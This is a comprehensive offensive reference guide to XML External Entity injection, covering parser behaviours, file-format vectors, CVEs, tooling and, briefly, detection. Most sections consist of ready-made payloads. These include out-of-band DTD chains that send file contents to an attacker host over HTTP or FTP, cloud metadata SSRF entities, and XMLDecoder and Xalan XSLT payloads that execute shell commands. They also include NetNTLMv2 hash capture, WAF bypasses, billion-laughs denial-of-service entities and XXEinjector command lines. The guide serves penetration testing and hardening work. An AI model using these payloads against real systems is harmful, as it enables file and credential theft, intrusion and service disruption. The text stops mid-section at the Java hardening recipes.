Comprehensive XXE Guide

A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 40 research sources.

Fundamentals
Attack Surface & Entry Points
Classic In-Band XXE
Blind XXE via External DTD
Error-Based XXE
Parameter Entities & Local DTD Chains
XXE → SSRF Pivoting
XXE → File Read & Information Disclosure
XXE → RCE
Parser-Specific Behaviors
XML File-Format Vectors
WAF & Filter Bypasses
Denial of Service
Real-World CVEs & Chains
Tooling
Detection & Prevention
Payload Quick Reference

1. Fundamentals

XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE.

Three classes:

Class	Description	Example
In-Band	Entity value reflected directly in response	XML-to-JSON converters, stock-lookup APIs
Blind / OOB	No reflection — data exfiltrated via DNS/HTTP/FTP to attacker DTD	SVG/DOCX processors, async workers
Error-Based	Content leaked through parser exception messages	Spring Boot `500` handlers, lxml `XMLSyntaxError`

Impact spectrum: DNS/HTTP callback → Arbitrary file read → Source code disclosure → Cloud metadata / IMDS token theft → Internal service enumeration → Credential capture (SMB hash) → Remote code execution (PHP expect, Java XMLDecoder, XSLT).

1.1 The XML DTD primer

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ELEMENT root ANY>
  <!ENTITY internal "literal value">
  <!ENTITY external SYSTEM "file:///etc/passwd">
  <!ENTITY % param  SYSTEM "http://attacker/evil.dtd">
]>
<root>&external;</root>

<!DOCTYPE …> — declares the document type and internal subset.
<!ELEMENT …> — declares allowed element structure (rarely required).
<!ENTITY name "value"> — general entity, referenced as &name; inside the document body.
<!ENTITY name SYSTEM "URI"> — external general entity, parser fetches the URI.
<!ENTITY % name …> — parameter entity, referenced as %name; inside the DTD only. Cannot appear inside the document body.
%name; inside the internal subset is the primitive behind blind and error-based XXE.

1.2 Entity reference rules that matter for exploitation

A general entity (&x;) can only reference text, not other SYSTEM identifiers. <!ENTITY x SYSTEM "http://host/?q=&y;"> is illegal.
Parameter entities (%x;) can be used to concatenate text into other declarations — the basis of the “evil.dtd” trick.
You cannot reference a parameter entity from within the same internal subset declaration it’s defined in — hence external DTDs are used to host the indirection.
Systems that blend internal + external DTDs allow redefinition of an entity originally declared externally — the key to local-DTD / error-based chains.
SYSTEM URIs may be file://, http://, https://, ftp://, gopher://, jar:, netdoc:, data:, php://…, expect://.

1.3 Why it’s still everywhere

XML is deep in legacy plumbing (SOAP, SAML, WS-Security, XMPP, RSS/Atom, Office Open XML, SVG, XLIFF, XMP, RDF, PDF metadata, Kubernetes API fallback, Android app processing).
Many parsers still default to permissive DTD handling (libxml2 with LIBXML_DTDLOAD | LIBXML_NOENT, Java SAX/DOM prior to JDK 13 hardening, .NET Framework 4.5.1 and earlier, old Nokogiri).
“JSON only” APIs often accept XML via Content-Type: application/xml or text/xml as an undocumented fallback — valuable injection points.
File-format fuzzers routinely uncover XXE in image/document processors that unzip Office documents behind the scenes.

2. Attack Surface & Entry Points

2.1 Request-level sinks

Category	Examples
XML request bodies	`Content-Type: application/xml`, `text/xml`, `application/soap+xml`, `application/xliff+xml`
JSON → XML conversion	APIs that accept both; toggle `Content-Type: application/xml` on a JSON endpoint
SOAP / WS- endpoints*	Legacy integrations, admin APIs, invoice/billing, enterprise middleware
SAML SSO	SAMLResponse, AuthnRequest, IdP metadata upload
RSS / Atom feeds	“Import feed”, link preview, social aggregators
File uploads	SVG avatars, DOCX/XLSX/PPTX importers, XMP images, EPUB, XLIFF, XFA PDF forms
XInclude points	Server-side XML templating where the DOCTYPE can’t be controlled but XML fragments can
Webhook/CI	XML build manifests, Maven POM, Gradle module metadata, `.csproj`, `.xib`, `.storyboard`
Printer/orchestration APIs	JMF (Job Messaging Format) on port 4004, XFDF, Xerox FreeFlow
SCADA / industrial	Batch job XML, OPC UA fallback, manufacturing execution systems

2.2 Code-level sinks

Java     javax.xml.parsers.DocumentBuilderFactory / SAXParserFactory
         javax.xml.transform.TransformerFactory
         javax.xml.validation.SchemaFactory
         javax.xml.stream.XMLInputFactory
         javax.xml.xpath.XPathFactory
         java.beans.XMLDecoder          -- deserialization → RCE
         org.jdom2.input.SAXBuilder
         org.dom4j.io.SAXReader
.NET     System.Xml.XmlDocument (with XmlUrlResolver)
         System.Xml.XmlTextReader       -- pre-4.5.2 defaults dangerous
         System.Xml.XmlReader + XmlReaderSettings { DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }
         System.Xml.XPath.XPathDocument
         System.Xml.Linq.XDocument (pre-4.5.2)
         System.Xml.Serialization.XmlSerializer
Python   xml.etree.ElementTree          -- safe by default for entities, still fetches DTDs via lxml
         lxml.etree (libxml2)           -- parameter-entity XXE until 5.4.0
         xml.dom.minidom
         xml.sax
         xmltodict                      -- wraps expat
PHP      libxml (SimpleXMLElement, DOMDocument, XMLReader)
         -- LIBXML_NOENT enables entity substitution (dangerous)
Ruby     Nokogiri                       -- DTDLOAD/NOENT opt-in required
         REXML                          -- XML bomb protection, still resolves ENTITY
Node.js  libxmljs, xml2js (with explicitArray/DOCTYPE allowed), xmldom, fast-xml-parser
Go       encoding/xml                   -- does not resolve SYSTEM, generally safe

2.3 Content-Type smuggling

If a POST endpoint accepts JSON, try swapping the body:

POST /api/order HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://collab/xxe">]>
<order><item>&x;</item></order>

Burp extension Content Type Converter automates the JSON→XML flip.

3. Classic In-Band XXE

When the parser reflects the entity value in the HTTP response, file disclosure is one request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
  <storeId>1</storeId>
</stockCheck>

When the parser rejects undeclared elements, add an ANY declaration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ELEMENT stockCheck ANY>
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
</stockCheck>

3.1 XInclude — DOCTYPE-less injection

Useful when the server builds the outer XML and only lets you inject a small fragment (e.g. a productId field that is inlined into a SOAP envelope):

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Requires an XInclude-aware parser. In Java: DocumentBuilderFactory.setXIncludeAware(true) or XOM/dom4j defaults.

3.2 Directory listing (Java file:// quirk)

libxml2 and the Java file: URL handler list directory contents when the URI points at a folder:

<!DOCTYPE r [<!ENTITY dir SYSTEM "file:///etc/">]>
<r>&dir;</r>

Java returns a newline-separated listing; libxml2 returns a text rendering. Use for filesystem enumeration before switching to targeted reads.

No reflection? Force the parser to fetch an attacker-hosted DTD and chain parameter entities.

4.1 Step 1 — prove external connectivity

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % ping SYSTEM "http://collab.example/"> %ping;]>
<r/>

If the Burp Collaborator / interact.sh receives a hit, the parser resolves parameter entities and will fetch remote DTDs.

4.2 Step 2 — chain a parameter entity for OOB exfil

Hosted at http://attacker/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker/x?d=%file;'>">
%eval;
%exfil;

Victim payload:

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe;]>
<r/>

Flow: victim parser fetches evil.dtd → defines %file → %eval builds %exfil dynamically → %exfil makes an HTTP GET with the file contents in the query string.

4.3 FTP for multi-line files

HTTP URL parsers strip newlines. For files like /etc/passwd use FTP, where the file contents ride as the password in the URI:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'ftp://a:%file;@attacker/x'>">
%all;
%send;

Pair with a dummy FTP listener (e.g. ONsec xxe-ftp-server.rb) that logs the PASS command without actually handshaking.

4.4 Gopher (legacy Java ≤ 1.7)

<!ENTITY % send SYSTEM "gopher://attacker:1337/?%file;">

Effectively extinct in modern deployments but still useful on embedded Java or ancient appliances.

4.5 DNS-only exfiltration

When only outbound DNS is allowed, encode one file-byte per subdomain via iterative XXE or use a tool like XXEinjector to chunk. For simple fingerprinting a bare DNS lookup is enough:

<!ENTITY % p SYSTEM "http://$(id).dns.attacker.tld/">

5. Error-Based XXE

Used when OOB is blocked (egress filtered) but the app surfaces parser errors.

5.1 External-DTD error variant

<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser tries to open file:///nonexistent/<contents of /etc/passwd>, fails, and embeds the missing-path string in the exception thrown back to the client.

5.2 Purely local (no egress) — local DTD trick

PortSwigger / Arseniy Sharoglazov’s technique: find a DTD that already exists on the server filesystem whose entities can be redefined from the internal subset.

Canonical example (GNOME yelp):

<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<r/>

%ISOamso; is redefined to inject additional declarations; when %local_dtd; is expanded the injected entities fire and produce the error.

Other high-hit local DTDs (see GoSecure dtd-finder for full list):

Path	Overridable entity
`/usr/share/yelp/dtd/docbookx.dtd`	`ISOamso`
`/usr/share/xml/fontconfig/fonts.dtd`	`constant`
`/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd`	various
`/opt/IBM/WebSphere/AppServer/properties/schemas/j2ee/XMLSchema.dtd`	WebSphere
`/usr/share/java/xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties`	Xalan
`C:\Windows\System32\wbem\xml\cim20.dtd`	Windows

Brute-force the DTD path with Intruder using the dtd_files.txt wordlist from the GoSecure repo.

5.3 GoSecure `dtd-finder`

java -jar dtd-finder.jar /path/to/docker-image.tar

Scans a tarball/Docker image for DTDs and automatically identifies entities that can be overridden. Point at the target’s base image to build a custom payload list.

6. Parameter Entities & Local DTD Chains

Understanding the parameter-entity gymnastics is essential because almost every advanced XXE variant boils down to:

Define %file that reads the target.
Define %eval that — when expanded — declares a third entity whose URI concatenates %file’s value.
Expand %eval, then expand the generated entity.

6.1 Character-reference encoding

Because % and & inside the internal subset are parsed immediately, you must delay their evaluation. Use character references:

Literal	Delayed form
`%`	`%`
`&`	`&`
`%` (one more level)	`&#x25;`

Rule of thumb: each layer of delayed expansion adds one more & wrap.

6.2 Double-encoded payload template

<!ENTITY % outer '
  <!ENTITY &#x25; file   SYSTEM "file:///flag">
  <!ENTITY &#x25; wrap   "<!ENTITY &#x26;#x25; leak SYSTEM &#x27;http://a/?x=&#x25;file;&#x27;>">
  &#x25;wrap;
  &#x25;leak;
'>
%outer;

6.3 lxml “meow://” trick (libxml2 bypass of 5.4.0 hardening)

lxml ≥ 5.4.0 blocked error-parameter entities, but general entities built from parameter entities still leak via a bogus scheme:

<!DOCTYPE colors [
  <!ENTITY % a '
    <!ENTITY % file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY % b "<!ENTITY c SYSTEM &#x27;meow://%file;&#x27;>">
  '>
  %a; %b;
]>
<colors>&c;</colors>

The parser reports failed to load external entity "meow://FLAG{secret}" — flag in error message, no egress needed.

Fixed in lxml ≥ 5.4.0 and libxml2 ≥ 2.13.8. Either alone is not sufficient.

7. XXE → SSRF Pivoting

Every XXE is an SSRF primitive. The http:// scheme inside a SYSTEM URI forces the server to issue an outbound request.

7.1 Cloud metadata exfil

AWS (IMDSv1):

<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

GCP:

<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">

Note: GCP IMDS requires Metadata-Flavor: Google header — XXE typically can’t set request headers, so GCP is usually a dead end unless the parser uses a custom HTTP client that forwards request headers.

Azure IMDS:

<!ENTITY az SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">

Azure also requires Metadata: true header — usually blocked, same caveat as GCP.

IMDSv2 on AWS requires a PUT to get a token — blocks naive XXE. If the backend still permits IMDSv1 via HttpTokens=optional, exploitation stays trivial.

7.2 Internal port scan / service enumeration

Error/response timing differences reveal open vs closed ports:

<!ENTITY scan SYSTEM "http://10.0.0.5:6379/">

Redis/Memcached/Elasticsearch without auth can sometimes be driven via gopher smuggling, though XXE alone lacks CRLF control.

7.3 JMF / print orchestration (Xerox FreeFlow Core)

Real case: a JMF listener on TCP/4004 parsed XML without hardening. A crafted JMF DOCTYPE with a SYSTEM entity caused the server to issue outbound HTTP, confirming SSRF. Chained with a subsequent path traversal, it led to unauthenticated RCE.

<?xml version="1.0"?>
<!DOCTYPE JMF [<!ENTITY probe SYSTEM "http://collab/oob">]>
<JMF SenderID="t" Version="1.3"><Query Type="KnownMessages">&probe;</Query></JMF>

8. XXE → File Read & Information Disclosure

8.1 High-value target files (Linux)

/etc/passwd               /etc/shadow (rarely readable)
/etc/hosts /etc/resolv.conf
/proc/self/environ        env vars, often contain secrets & tokens
/proc/self/cmdline        full process command line
/proc/self/cwd/<file>     relative-path access
/proc/self/net/tcp        open sockets
/proc/self/status
/proc/version /etc/issue  fingerprinting
/proc/1/maps              memory mappings
/root/.ssh/id_rsa /root/.aws/credentials  if root-run
/var/lib/kubelet/config.yaml
/run/secrets/kubernetes.io/serviceaccount/token

8.2 Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Windows\System32\inetsrv\config\applicationHost.config
file://attacker-smb-share/a.jpg  → NetNTLMv2 hash capture via Responder

8.3 Binary & non-ASCII file read

Raw file:// breaks on non-XML-safe bytes. Wrap in base64 via PHP filter:

<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">

Java: wrap the read inside a CDATA block via a two-stage entity construction (XXEinjector --cdata mode).

8.4 Source code recovery

PHP filters cover the filesystem; combine with .git/config, .svn/wc.db, composer.json, framework configs to rebuild source trees.

9. XXE → RCE

9.1 PHP `expect://` wrapper

If the expect extension is loaded:

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]>
<r>&x;</r>

Rare in the wild — pecl expect is almost never deployed — but still worth testing when PHP fingerprint is confirmed.

9.2 Java XMLDecoder deserialization

java.beans.XMLDecoder.readObject() processes XML that instantiates arbitrary classes. If an app exposes it to user input, it’s instant RCE (not strictly XXE but frequently conflated because the entry point is XML).

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <array class="java.lang.String" length="3">
        <void index="0"><string>/bin/sh</string></void>
        <void index="1"><string>-c</string></void>
        <void index="2"><string>id &gt; /tmp/p</string></void>
      </array>
    </void>
  </object>
</java>

Real CVE targets: Oracle WebLogic CVE-2017-10271, Restlet XMLDecoder endpoints.

9.3 XSLT → Java RCE via Xalan

If you can control a stylesheet (or feed XSLT to a Transformer):

<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
  xmlns:str="http://xml.apache.org/xalan/java/java.lang.String">
  <xsl:template match="/">
    <xsl:variable name="cmd">touch /tmp/pwn</xsl:variable>
    <xsl:variable name="rt" select="rt:getRuntime()"/>
    <xsl:variable name="p"  select="rt:exec($rt,$cmd)"/>
  </xsl:template>
</xsl:stylesheet>

Default-enabled on Java’s Xalan until JDK 15 introduced jdk.xml.enableExtensionFunctions=false.

9.4 `jar:` protocol → file-write → RCE chain

Java’s jar:http://… handler downloads a ZIP to /tmp/…, extracts it, reads a member, then deletes the archive. Hanging the HTTP server indefinitely keeps the temp file alive. Combined with a second vulnerability (LFI, template injection, deserialization, XSLT upload) this yields RCE.

<!ENTITY x SYSTEM "jar:http://attacker:8080/evil.zip!/marker.txt">

Workshop tooling: slow_http_server.py / slowserver.jar from GoSecure xxe-workshop.

9.5 NetNTLMv2 capture (Windows)

<!ENTITY x SYSTEM "file:////attacker/share/a.jpg">

Point Responder.py -I eth0 at the listener, capture the NetNTLMv2 hash, crack with hashcat -m 5600.

10. Parser-Specific Behaviors

10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)

External entity resolution is off by default since 2.9.0 unless LIBXML_NOENT or LIBXML_DTDLOAD is set.
PHP’s libxml_disable_entity_loader(true) was the historical fix (deprecated in PHP 8).
Parameter-entity expansion continued even with “safe” settings until 2.13.8.
Directory listing via file:///etc/ supported.

10.2 Xerces (Java SAX/DOM)

DocumentBuilderFactory / SAXParserFactory still default to entity resolution enabled unless features explicitly disabled.
Hardening flags (all must be set):
- http://apache.org/xml/features/disallow-doctype-decl → true (best defence)
- http://xml.org/sax/features/external-general-entities → false
- http://xml.org/sax/features/external-parameter-entities → false
- http://apache.org/xml/features/nonvalidating/load-external-dtd → false
- FEATURE_SECURE_PROCESSING → true
- setXIncludeAware(false); setExpandEntityReferences(false)
TransformerFactory, SchemaFactory, XPathFactory, Validator, SAXTransformerFactory each need independent hardening via ACCESS_EXTERNAL_DTD / ACCESS_EXTERNAL_STYLESHEET / ACCESS_EXTERNAL_SCHEMA.

10.3 .NET

API	Default (pre-4.5.2)	Default (4.5.2+)
`XmlDocument`	`XmlUrlResolver` present — vulnerable	`XmlResolver = null` — safe
`XmlTextReader`	`ProhibitDtd = false` — vulnerable	`DtdProcessing = Prohibit` — safe
`XmlReader` (via `XmlReader.Create`)	`DtdProcessing = Prohibit` — safe	safe
`XPathDocument`	dangerous	fixed
`XDocument` / `XElement`	uses XmlReader internally — generally safe	safe

Always dangerous regardless of version: setting XmlResolver = new XmlUrlResolver() or DtdProcessing = Parse with non-null resolver.

Look for these patterns in C# code review:

var rdr = new XmlTextReader(input);
rdr.XmlResolver = new XmlUrlResolver();           // BAD
rdr.DtdProcessing = DtdProcessing.Parse;          // BAD

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Parse,          // BAD
    XmlResolver  = new XmlUrlResolver(),          // BAD
    MaxCharactersFromEntities = 0                 // enables unbounded billion-laughs
};

Real CVE: CVE-2025-27136 in the LocalS3 Java S3 emulator used a default DocumentBuilderFactory on the CreateBucketConfiguration endpoint, letting unauthenticated attackers read /etc/passwd.

10.4 Python lxml

Safe mode: etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True).
Parameter-entity XXE viable before lxml 5.4.0 / libxml2 2.13.8, even with resolve_entities=False, when load_dtd=True.
defusedxml package monkey-patches stdlib/lxml to block DOCTYPE entirely — recommended.

10.5 Nokogiri (Ruby)

Safe by default. Dangerous only when DTDLOAD | NOENT passed:

Nokogiri::XML(input) { |c| c.dtdload.noent }   # BAD

REXML::Document — inherits from ruby-stdlib; patches since 2013 cap recursion but general entities still expand.

10.6 Go `encoding/xml`

Does not resolve SYSTEM entities. Historically considered safe.
Custom decoders (etree, html-xml-tools) can still be coaxed to fetch DTDs — review any third-party XML lib on Go.

11. XML File-Format Vectors

Any file whose internals contain XML is an XXE delivery vehicle.

11.1 SVG (file upload)

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
  <text>&x;</text>
</svg>

Or <image xlink:href="file:///etc/hostname"/>. Works against ImageMagick (prior to policy.xml hardening), librsvg, Inkscape, Apache Batik, many cloud image processors.

11.2 Office Open XML (DOCX, XLSX, PPTX)

unzip foo.docx -d foo/
Edit foo/word/document.xml (or xl/workbook.xml) — insert <!DOCTYPE …> with payload between the XML prolog and the root element.
cd foo && zip -r ../evil.docx .
Upload to the target’s document-processing feature (resume parsers, invoice ingest, doc-to-PDF).

11.3 XLIFF (translation files)

Apache Tika, Okapi, XLIFF Toolbox. Example that worked against a Java 1.8 parser (see clipped article):

<?xml version="1.0"?>
<!DOCTYPE XXE [<!ENTITY % remote SYSTEM "http://attacker/evil.dtd"> %remote;]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"/>

11.4 PDF (XFA forms, XMP metadata)

Acrobat XFA forms wrap XML; PDF metadata (/Metadata stream) carries an XMP packet. Many server-side PDF handlers (iText, PDFBox, Ghostscript) parse these.

11.5 EPUB, ODF

EPUB is a ZIP containing XHTML + OPF XML. ODF (LibreOffice) is a ZIP of content.xml / styles.xml. Both have historical XXE CVEs in reader software.

11.6 SVG / MathML embedded in HTML

If an HTML sanitizer passes SVG through unchanged and a later stage parses it with an XML parser, XXE is reachable even when the primary input is HTML.

11.7 SOAP envelopes

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo><![CDATA[<!DOCTYPE d [<!ENTITY % r SYSTEM "http://a/e.dtd"> %r;]><d/>]]></foo>
  </soap:Body>
</soap:Envelope>

CDATA wrapping sometimes bypasses outer sanitization.

11.8 SAML

SAMLResponse XML is base64-encoded before transport — decode, inject DOCTYPE, re-encode. Signature validation may invalidate the payload unless the IdP-trust relationship allows a re-signed document; however many SPs parse the XML before signature verification (classic XSW-style bugs), making XXE trivially reachable.

11.9 RSS / Atom

Feed-ingest services (Feedly-like, Slack preview bots, Hootsuite) routinely fetch user URLs and parse RSS. Host a poisoned feed and wait.

11.10 Android / iOS asset bundles

Android manifest, .xib, .storyboard, .plist (XML variant) — XXE reached via supply-chain build tooling has produced numerous CI takeovers.

12. WAF & Filter Bypasses

12.1 Encoding

UTF-7 / UTF-16: re-encode payload, declare encoding="UTF-7" in the prolog. Many WAFs only inspect UTF-8.
HTML numeric entities inside the DTD to obscure the DOCTYPE/ENTITY keywords (the parser resolves them before interpreting).
Comment injection: .

12.2 Scheme alternatives

Blocked	Alternative
`file:///etc/passwd`	`netdoc:///etc/passwd` (Java)
`file://`	`jar:file:///`
`http://`	`https://`, `ftp://`, `gopher://`
`SYSTEM` keyword filtered	`PUBLIC "-//W3C//DTD..." "URI"` — PUBLIC identifiers also trigger fetches

12.3 `data://` smuggling

<!DOCTYPE r [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init;]><r/>

If the parser resolves data: URIs, the base64 inside decodes at parse time and effectively imports an arbitrary DTD payload past string-based filters.

12.4 Nested general-entity bypass via HTML entities

From Ambrotd/XXE-Notes — obfuscate the inner ENTITY so regex filters on SYSTEM and % don’t match:

<!DOCTYPE foo [
  <!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;http://a/e.dtd&#x22;&#x3E;">
  %a;%dtd;
]>
<data><env>&exfil;</env></data>

12.5 WrapWrap / Lightyear PHP tricks

Swarm’s “Impossible XXE in PHP” demonstrated chaining php://filter chains (convert.iconv.*) to bypass strict <?xml / <!DOCTYPE byte filters by generating the required bytes via iconv transformations inside the filter chain itself. Highly situational but lethal when the simpler bypasses fail.

13. Denial of Service

13.1 Billion Laughs

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

9 levels = ~10⁹ expansions, gigabytes of memory.

13.2 Quadratic blowup

One giant entity ("A" * 100000) referenced 10,000 times. Bypasses entityExpansionLimit in some parsers because it’s a single entity.

13.3 External resource DoS

<!ENTITY x SYSTEM "http://slowloris.internal/never-closes">
<!ENTITY y SYSTEM "file:///dev/urandom">
<!ENTITY z SYSTEM "file:///dev/zero">

Each forces the server thread to hang — cheap resource exhaustion.

13.4 YAML variant (“Billion Lols” in YAML)

YAML anchors/aliases have the same problem. Any parser that re-dereferences aliases recursively is vulnerable. Real case: Visual Studio 2022 consumed 100 GB of RAM on a crafted XAML file (XEE — XML Entity Expansion).

14. Real-World CVEs & Chains

CVE	Product	Notes
CVE-2014-3660	libxml2	Entity expansion amplification fix
CVE-2017-10271	Oracle WebLogic	`wls-wsat` XMLDecoder → unauth RCE
CVE-2018-1000840	Apache Batik	SVG `xlink:href="file://"` disclosure
CVE-2019-17571	Apache log4j 1.2 SocketServer	XML deserialization
CVE-2020-5245	dropwizard-validation	XXE via Jersey XmlProvider
CVE-2021-33813	JDOM	SAXBuilder external DTD
CVE-2021-34429	Eclipse Jetty	XML file list through XInclude
CVE-2022-1471	SnakeYAML (XEE cousin)	tag-based RCE via typed deserialisation
CVE-2023-34034	Spring Security	SAML XXE pre-signature
CVE-2024-22257	Spring Security	SAML signature XXE
CVE-2025-27136	LocalS3 (Java S3 emulator)	`DocumentBuilderFactory` default → unauth file read on `CreateBucketConfiguration`
CVE-2025-49493	Akamai CloudTest	XXE in test-case import allowing file read
CVE-2025-68493	Apache Struts	XXE in action XML configuration parsing
CVE-2026-29924	Grav CMS ≤ 1.7.x	Admin-panel SVG upload → authenticated XXE, file read + SSRF
Cisco ISE	Identity Services Engine	XXE in external-identity integration XML
Xerox FreeFlow Core	JMF listener on :4004	DOCTYPE allowed → unauth SSRF + path traversal → RCE
Horizon3 “Support Ticket to 0-day”	FreeFlow Core	Full exploit chain write-up: XXE → SSRF → path traversal → RCE

Creative chain: OOB XXE used to enumerate /proc/self/environ, leaked a service credential, which unlocked a privileged endpoint that returned the filesystem root. Illustrates that initial “boring” file read often unlocks higher-privilege primitives.

14.2 Bugcrowd / H1 patterns

Recurring paid reports:

SVG avatar → XXE file read on Rails / Node image processors.
DOCX import → blind OOB XXE on HR/ATS platforms.
SAML metadata upload → admin-role XXE on Okta-competitor SSO.
XLSX bulk-import → XXE reading /proc/self/environ → DB credential disclosure.

15. Tooling

15.1 XXEinjector (Ruby)

Automates direct + OOB exploitation. Highlights:

OOB methods: FTP (default), HTTP, gopher (Java ≤ 1.7).
Directory enumeration (Java) or file brute-forcing (any).
Second-order: sends the XXE in one request, reads it back from a second.
--phpfilter auto-wraps reads in php://filter/convert.base64-encode.
--hashes triggers SMB to steal NetNTLMv2.
--expect uses PHP expect wrapper for RCE.
--upload uses jar: to drop files in temp dir.
--xslt tests for XSLT injection.

ruby XXEinjector.rb --host=10.0.0.2 --path=/etc --file=req.txt --oob=http
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --phpfilter --brute=files.txt
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --hashes

15.2 XXExploiter (Node/TS — luisfontes19)

Generates payloads and serves the companion HTTP/FTP infrastructure in one go. Useful when you don’t want to stand up separate listeners.

15.3 BuffaloWill/oxml_xxe

Embeds XXE payloads into DOCX/XLSX/SVG/GPX/XMP/EPUB/IDML/PDF/HWP wrappers automatically. One-click for file-format vectors.

15.4 GoSecure dtd-finder

java -jar dtd-finder.jar target-image.tar

Scans Docker images / tarballs for DTD files and identifies overridable entities — indispensable for error-based local-DTD attacks.

15.5 defusedxml (Python)

Defensive. Monkey-patches xml.etree, lxml, xml.sax, xmlrpc to forbid DOCTYPE, external entities, and entity-expansion bombs. Use in any Python codebase handling untrusted XML.

15.6 Burp Suite extensions

Content Type Converter — flip JSON requests to XML/YAML.
HackVertor — tag-based encoding for rapid payload mutation.
XXE-Hunter — auto-detect XXE in requests with XML bodies.
Reissue Request Scripter — build Python scripts for iterative XXE file reads.
Burp Collaborator — essential OOB endpoint.

15.7 OOB infrastructure

Burp Collaborator (paid).
interact.sh / interactsh-client from ProjectDiscovery (free).
canarytokens.org for one-shot DNS tokens.
Dummy FTP for password-channel exfil: ONsec xxe-ftp-server.rb.
slow_http_server.py / slowserver.jar for jar: chain abuse.

16. Detection & Prevention

16.1 Static analysis patterns

Search for any XML parser instantiation not accompanied by hardening flags:

Java    DocumentBuilderFactory.newInstance()     # without setFeature hardening
        SAXParserFactory.newInstance()
        TransformerFactory.newInstance()
        SchemaFactory.newInstance()
        XMLInputFactory.newFactory()
        SAXReader                                # dom4j
        SAXBuilder                               # jdom2
        java.beans.XMLDecoder                    # RCE risk

.NET    new XmlDocument()                        # check .XmlResolver assignments
        new XmlTextReader(...)                   # check .DtdProcessing & .XmlResolver
        new XmlReaderSettings { DtdProcessing = DtdProcessing.Parse }
        XmlSerializer.Deserialize(stream)

Python  lxml.etree.XMLParser(load_dtd=True)
        lxml.etree.XMLParser(resolve_entities=True)
        xml.sax.make_parser()                    # use defusedxml instead
        xml.dom.pulldom / xml.etree              # inspect parser flags

PHP     simplexml_load_string($x, null, LIBXML_NOENT | LIBXML_DTDLOAD)
        DOMDocument::loadXML($x, LIBXML_NOENT)
        libxml_disable_entity_loader(false)      # explicit re-enable

Ruby    Nokogiri::XML(input) { |c| c.noent.dtdload }
        REXML::Document.new(input)

Node    new xmldom.DOMParser()                   # check for entityExpansionLimit
        xml2js.parseString(..., { explicitCharkey: true })

16.2 Secure-by-default recipes

Java:

